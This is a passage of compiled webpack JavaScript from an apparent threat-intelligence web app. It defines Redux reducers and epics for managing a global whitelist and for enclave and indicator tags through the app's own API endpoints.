  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      field = action.field;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* UPDATE_PAGE_FILTERS */]:
      if (!field) {
        // Error message for now until better solution
        console.error('Error updating filter, missing field name or \'all\'');
        return state;
      }

      if (field && field.includes('.')) {
        // Nested fields separated by .
        var updatePath = field.split('.');
        return state.setIn(updatePath, payload);
      }
      if (field && field === 'query') {
        state = state.set('pageNumber', 0);
      }
      return state.set(field, payload.get(field));
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* RESET_PAGE_FILTERS */]:
      return __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  entries: entries,
  loading: loading,
  currentQuery: currentQuery,
  modalOpen: modalOpen
}));

/***/ }),
/* 3421 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants__ = __webpack_require__(1468);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__action_types__ = __webpack_require__(796);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__types__ = __webpack_require__(798);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__getters_js__ = __webpack_require__(797);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__utils__ = __webpack_require__(1469);














var formatSearchRequest = function formatSearchRequest(payload) {
  var sort = payload.getIn(['sort', 'sort'], {});
  var params = {
    'query': payload.get('query'),
    'sort': sort.sortBy + ',' + sort.sortDirection,
    'pageNumber': payload.get('pageNumber'),
    'pageSize': payload.get('pageSize')
  };
  return Object(__WEBPACK_IMPORTED_MODULE_3_querystring__["stringify"])(params);
};

var viewLoadedEpic = function viewLoadedEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__["LOCATION_CHANGE"]).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('payload')).filter(function (x) {
    return x.pathname === '/settings/global-whitelist';
  }).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["g" /* FETCH_WHITELIST_PAGE */] }]);
  });
};

/* Fetches all whitelist entries and aliases */
var fetchWhitelistPageEpic = function fetchWhitelistPageEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["g" /* FETCH_WHITELIST_PAGE */], __WEBPACK_IMPORTED_MODULE_7__action_types__["q" /* UPDATE_PAGE_FILTERS */], __WEBPACK_IMPORTED_MODULE_7__action_types__["j" /* RESET_PAGE_FILTERS */]).mergeMap(function () {
    var currentQuery = __WEBPACK_IMPORTED_MODULE_9__getters_js__["currentQuery"](store.getState());
    return ajax.get(__WEBPACK_IMPORTED_MODULE_6__constants__["WHITELIST_ENDPOINT"] + '?' + formatSearchRequest(currentQuery)).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (response) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["i" /* FETCH_WHITELIST_PAGE_SUCCESS */],
        payload: __WEBPACK_IMPORTED_MODULE_8__types__["WhitelistPage"](response)
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["h" /* FETCH_WHITELIST_PAGE_FAILURE */] });
    });
  });
};

/* Adds a new whitelist term and aliases */
var saveWhitelistEntryEpic = function saveWhitelistEntryEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["n" /* SAVE_WHITELIST_ENTRY */]).mergeMap(function (_ref3) {
    var payload = _ref3.payload;

    var encodedText = encodeURIComponent(payload.get('text'));
    var saveType = payload.get('guid') ? 'updated' : 'saved';
    var successMessage = 'The Whitelist term ' + payload.get('text') + ' was ' + saveType + ' successfully.';
    return ajax.post(__WEBPACK_IMPORTED_MODULE_6__constants__["WHITELIST_ENDPOINT"] + '?text=' + encodedText).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (entry) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["p" /* SAVE_WHITELIST_ENTRY_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_11__utils__["normalizeWhitelistEntry"])(entry),
        meta: {
          alert: { type: 'success', text: successMessage }
        }
      };
    }).catch(function (err) {
      var serverError = Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["path"])(['xhr', 'response', 'message'], err);
      var message = serverError ? serverError : 'There was an error adding the Whitelist term.';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["o" /* SAVE_WHITELIST_ENTRY_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])(message)]);
    });
  });
};

/* Batch add new terms */
var saveWhitelistEntriesEpic = function saveWhitelistEntriesEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["k" /* SAVE_WHITELIST_ENTRIES */]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;

    var textArray = payload.toJS();
    var successMessage = 'The Whitelist terms were added successfully.';
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_6__constants__["WHITELIST_ENDPOINT"] + '/batch', textArray).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (entries) {
      var entriesList = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(entries.map(function (d) {
        return Object(__WEBPACK_IMPORTED_MODULE_11__utils__["normalizeWhitelistEntry"])(d);
      }));
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["m" /* SAVE_WHITELIST_ENTRIES_SUCCESS */],
        payload: entriesList,
        meta: {
          alert: { type: 'success', text: successMessage }
        }
      };
    }).catch(function (err) {
      var serverError = Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["path"])(['xhr', 'response', 'message'], err);
      var message = serverError ? serverError : 'There was an error adding the whitelist term.';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["l" /* SAVE_WHITELIST_ENTRIES_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])(message)]);
    });
  });
};

/* Removes a whitelist term */
var deleteWhitelistEntryEpic = function deleteWhitelistEntryEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["d" /* DELETE_WHITELIST_ENTRY */]).mergeMap(function (_ref7) {
    var payload = _ref7.payload;

    var guid = payload.get('guid');
    var text = payload.get('text');
    return ajax.delete(__WEBPACK_IMPORTED_MODULE_6__constants__["WHITELIST_ENDPOINT"] + '/' + guid).map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["f" /* DELETE_WHITELIST_ENTRY_SUCCESS */],
        payload: payload,
        meta: {
          alert: { type: 'success', text: 'The Global Whitelist term \'' + text + '\' was deleted successfully.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["e" /* DELETE_WHITELIST_ENTRY_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])('There was an error removing the Global Whitelist term ' + text + '.')]);
    });
  });
};

var clearWhitelistEpic = function clearWhitelistEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["a" /* CLEAR_WHITELIST */]).mergeMap(function (_ref9) {
    var payload = _ref9.payload;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_6__constants__["WHITELIST_ENDPOINT"] + '/clear').map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["c" /* CLEAR_WHITELIST_SUCCESS */],
        payload: payload,
        meta: {
          alert: { type: 'success', text: 'The Global Whitelist terms were successfully cleared.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["b" /* CLEAR_WHITELIST_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])('There was an error clearing the Global Whitelist.')]);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_4_redux_observable__["combineEpics"])(viewLoadedEpic, fetchWhitelistPageEpic, saveWhitelistEntryEpic, saveWhitelistEntriesEpic, deleteWhitelistEntryEpic, clearWhitelistEpic));

/***/ }),
/* 3422 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setModalOpen", function() { return setModalOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "addIndicatorTag", function() { return addIndicatorTag; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "addIndicatorTagsBulk", function() { return addIndicatorTagsBulk; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteIndicatorTag", function() { return deleteIndicatorTag; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchEnclaveTags", function() { return fetchEnclaveTags; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(364);


/* NOTE: All tags are fetched during app initialization */

var setModalOpen = function setModalOpen(open) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["q" /* SET_MODAL_OPTIONS */],
    payload: open
  };
};

var addIndicatorTag = function addIndicatorTag(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* ADD_INDICATOR_TAG */],
    payload: payload
  };
};

var addIndicatorTagsBulk = function addIndicatorTagsBulk(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["b" /* ADD_INDICATOR_TAGS_BULK */],
    payload: payload
  };
};

var deleteIndicatorTag = function deleteIndicatorTag(guid, type, value) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["n" /* REMOVE_INDICATOR_TAG */],
    payload: { guid: guid, type: type, value: value }
  };
};

var fetchEnclaveTags = function fetchEnclaveTags() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["h" /* FETCH_ENCLAVE_TAGS */]
  };
};

/***/ }),
/* 3423 */
/***/ (function(module, exports) {



/***/ }),
/* 3424 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export tagsListToOrderedMap */
/* unused harmony export attributes */
/* unused harmony export enclaveTags */
/* unused harmony export indicatorTags */
/* unused harmony export loading */
/* unused harmony export modalOpen */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(513);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(364);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__ = __webpack_require__(92);









/* **************************************************************************
 * Tags
 * *************************************************************************/

var tagsListToOrderedMap = function tagsListToOrderedMap(tags) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(tags).toOrderedMap().mapKeys(function (k, v) {
    return v.get('guid');
  });
};

var onSetTagSuccess = function onSetTagSuccess(state, _ref) {
  var reportGuid = _ref.reportGuid,
      tag = _ref.tag;

  return state.set(tag.get('guid'), tag);
};

/**
 * NOTE: The attributes store and enclaveTags store are almost the same, they
 * could likely be refactored for less boilerplate. For now i'm opting for the
 * consistency and simplicity of separate reducers.
 */
var attributes = function attributes() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* FETCH_ATTRIBUTES_SUCCESS */]:
      return tagsListToOrderedMap(payload).map(__WEBPACK_IMPORTED_MODULE_2__types_js__["a" /* Attribute */]);
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["G" /* SET_ATTRIBUTE_SUCCESS */]:
      return onSetTagSuccess(state, payload);
    default:
      return state;
  }
};

var enclaveTags = function enclaveTags() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_ENCLAVE_TAGS_SUCCESS */]:
      return tagsListToOrderedMap(payload).map(__WEBPACK_IMPORTED_MODULE_2__types_js__["b" /* EnclaveTag */]);
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["M" /* SET_ENCLAVE_TAG_SUCCESS */]:
      return onSetTagSuccess(state, payload);
    default:
      return state;
  }
};

var indicatorTags = function indicatorTags() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* ADD_INDICATOR_TAG_SUCCESS */]:
      return state.updateIn([payload.enclaveId, payload.guid], function () {
        return Object(__WEBPACK_IMPORTED_MODULE_2__types_js__["d" /* IndicatorTag */])(payload);
      });
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* FETCH_INDICATOR_TAGS_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).map(function (e) {
        return tagsListToOrderedMap(e).map(__WEBPACK_IMPORTED_MODULE_2__types_js__["b" /* EnclaveTag */]);
      });
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* FETCH_ENCLAVE_TAGS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* FETCH_ATTRIBUTES */]:
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["J" /* SET_ENCLAVE_TAG */]:
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["E" /* SET_ATTRIBUTE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* FETCH_INDICATOR_TAGS */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_ENCLAVE_TAGS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_ENCLAVE_TAGS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* FETCH_ATTRIBUTES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_ATTRIBUTES_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["G" /* SET_ATTRIBUTE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["F" /* SET_ATTRIBUTE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["M" /* SET_ENCLAVE_TAG_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_4_modules_reports_action_types_js__["L" /* SET_ENCLAVE_TAG_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* FETCH_INDICATOR_TAGS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* FETCH_INDICATOR_TAGS_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/*
 * NOTE: Modal serves report and indicator enclave tags. Because it only makes
 * sense for the modal to be open for one of these at one time, we can reuse this
 * generic "tags modal" state to manage both.
 */
var modalOpen = function modalOpen() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* SET_MODAL_OPTIONS */]:
      return payload;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  attributes: attributes,
  enclaveTags: enclaveTags,
  indicatorTags: indicatorTags,
  loading: loading,
  modalOpen: modalOpen
}));

/***/ }),
/* 3425 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_tags_utils__ = __webpack_require__(763);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_utils_index__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_indicators_action_types__ = __webpack_require__(241);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__types__ = __webpack_require__(513);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__action_types__ = __webpack_require__(364);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_app_action_types__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_indicators_actions__ = __webpack_require__(577);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_indicators_utils__ = __webpack_require__(762);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14__reports_constants__ = __webpack_require__(575);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15__reports_action_types__ = __webpack_require__(92);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };







var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:modules:tags:epics'); // eslint-disable-line no-unused-vars













var indicatorsUrl = function indicatorsUrl(params, url) {
  return Object(__WEBPACK_IMPORTED_MODULE_5_trustar_utils_index__["querystring"])(params, url);
};

var fetchAttributesEpic = function fetchAttributesEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["e" /* FETCH_ATTRIBUTES */], __WEBPACK_IMPORTED_MODULE_9_modules_app_action_types__["INITIALIZE"]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_7__types__["e" /* TAGS_ENDPOINT */] + '/public-tags').map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).map(function (tags) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_8__action_types__["g" /* FETCH_ATTRIBUTES_SUCCESS */],
        payload: tags
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["f" /* FETCH_ATTRIBUTES_FAILURE */] });
    });
  });
};

var fetchEnclaveTagsEpic = function fetchEnclaveTagsEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["h" /* FETCH_ENCLAVE_TAGS */], __WEBPACK_IMPORTED_MODULE_9_modules_app_action_types__["INITIALIZE"]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_7__types__["e" /* TAGS_ENDPOINT */] + '/enclave-tags').map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).map(function (tags) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_8__action_types__["j" /* FETCH_ENCLAVE_TAGS_SUCCESS */],
        payload: tags
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["i" /* FETCH_ENCLAVE_TAGS_FAILURE */] });
    });
  });
};

var fetchIndicatorTagsEpic = function fetchIndicatorTagsEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["k" /* FETCH_INDICATOR_TAGS */], __WEBPACK_IMPORTED_MODULE_9_modules_app_action_types__["INITIALIZE"], __WEBPACK_IMPORTED_MODULE_6_modules_indicators_action_types__["w" /* REFRESH_INDICATOR_LIST */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_7__types__["c" /* INDICATOR_TAGS_ENDPOINT */]).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).map(function (tags) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_8__action_types__["m" /* FETCH_INDICATOR_TAGS_SUCCESS */],
        payload: tags
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["l" /* FETCH_INDICATOR_TAGS_FAILURE */] });
    });
  });
};

var addIndicatorTagEpic = function addIndicatorTagEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["a" /* ADD_INDICATOR_TAG */]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;
    var enclaveGuid = payload.enclaveGuid,
        name = payload.name,
        type = payload.type,
        value = payload.value;

    if (!name) return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_10__alerts_actions__["warn"])('Tag name must exist.')); // Check name length... don't add an existing tag to the store
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_7__types__["c" /* INDICATOR_TAGS_ENDPOINT */] + '?type=' + type + '&value=' + value, Object(__WEBPACK_IMPORTED_MODULE_13_immutable__["fromJS"])({
      enclaveId: enclaveGuid,
      name: name
    })).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).mergeMap(function (response) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["d" /* ADD_INDICATOR_TAG_SUCCESS */], payload: response }, Object(__WEBPACK_IMPORTED_MODULE_11_modules_indicators_actions__["fetchIndicatorMetadata"])(type, value), Object(__WEBPACK_IMPORTED_MODULE_10__alerts_actions__["success"])(response.name + ' tag added.')];
    }).catch(function (err) {
      var message = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["path"])(['xhr', 'response', 'message'], err);
      return [{ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["c" /* ADD_INDICATOR_TAG_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_10__alerts_actions__["error"])(message ? message : 'Indicator tag could not be added.')];
    });
  });
};

var indicatorTagErrorMessageObservable = function indicatorTagErrorMessageObservable(message) {
  var err = new Error(message);
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
    type: __WEBPACK_IMPORTED_MODULE_8__action_types__["c" /* ADD_INDICATOR_TAG_FAILURE */],
    error: true,
    payload: err,
    meta: {
      alert: { type: 'error', text: err.message }
    }
  });
};

var addIndicatorTagsBulk = function addIndicatorTagsBulk(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["b" /* ADD_INDICATOR_TAGS_BULK */]).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('payload')).mergeMap(function (_ref7) {
    var type = _ref7.type,
        value = _ref7.value,
        enclaveIds = _ref7.enclaveIds,
        addedTags = _ref7.addedTags,
        removedTags = _ref7.removedTags;

    var message = void 0;

    var tagCombos = enclaveIds.flatMap(function (enclaveId) {
      return addedTags.map(function (name) {
        if (!name.trim()) message = 'No tag name specified.';
        if (name.length > __WEBPACK_IMPORTED_MODULE_14__reports_constants__["b" /* MAX_TAG_LENGTH */]) message = 'Tag name must be less than ' + __WEBPACK_IMPORTED_MODULE_14__reports_constants__["b" /* MAX_TAG_LENGTH */] + ' characters.';
        return { type: type, value: value, enclaveGuid: enclaveId, name: name };
      });
    });

    var indicatorTagCombinationsForDeletion = removedTags && enclaveIds.flatMap(function (enclaveId) {
      return removedTags.map(function (name) {
        if (!name.trim()) message = 'No tag name specified.';
        if (name.length > __WEBPACK_IMPORTED_MODULE_14__reports_constants__["b" /* MAX_TAG_LENGTH */]) message = 'Tag name must be less than ' + __WEBPACK_IMPORTED_MODULE_14__reports_constants__["b" /* MAX_TAG_LENGTH */] + ' characters.';
        return { type: type, value: value, enclaveGuid: enclaveId, name: name };
      });
    });

    if (message) {
      return indicatorTagErrorMessageObservable(message);
    }
    var formattedTagsObject = Object(__WEBPACK_IMPORTED_MODULE_4_modules_tags_utils__["formatTagsToBulk"])(tagCombos, indicatorTagCombinationsForDeletion);
    var formattedBulkTagPayload = _extends({
      indicator: {
        value: value,
        type: type
      }
    }, formattedTagsObject);

    return ajax.postJSON('' + __WEBPACK_IMPORTED_MODULE_7__types__["c" /* INDICATOR_TAGS_ENDPOINT */], formattedBulkTagPayload).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).map(function (response) {
      return Object(__WEBPACK_IMPORTED_MODULE_13_immutable__["fromJS"])(response);
    }).mergeMap(function (tagResponse) {
      var _formatBulkTagRespons = Object(__WEBPACK_IMPORTED_MODULE_4_modules_tags_utils__["formatBulkTagResponse"])(tagResponse, tagCombos).toJS(),
          _formatBulkTagRespons2 = _formatBulkTagRespons.addedTags,
          addedTags = _formatBulkTagRespons2 === undefined ? Object(__WEBPACK_IMPORTED_MODULE_13_immutable__["List"])() : _formatBulkTagRespons2,
          _formatBulkTagRespons3 = _formatBulkTagRespons.removedTags,
          removedTags = _formatBulkTagRespons3 === undefined ? Object(__WEBPACK_IMPORTED_MODULE_13_immutable__["List"])() : _formatBulkTagRespons3;

      var postOpActions = [Object(__WEBPACK_IMPORTED_MODULE_11_modules_indicators_actions__["fetchIndicatorMetadata"])(type, value), { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["k" /* FETCH_INDICATOR_TAGS */] }];
      var tagOperations = addedTags.map(function (tag) {
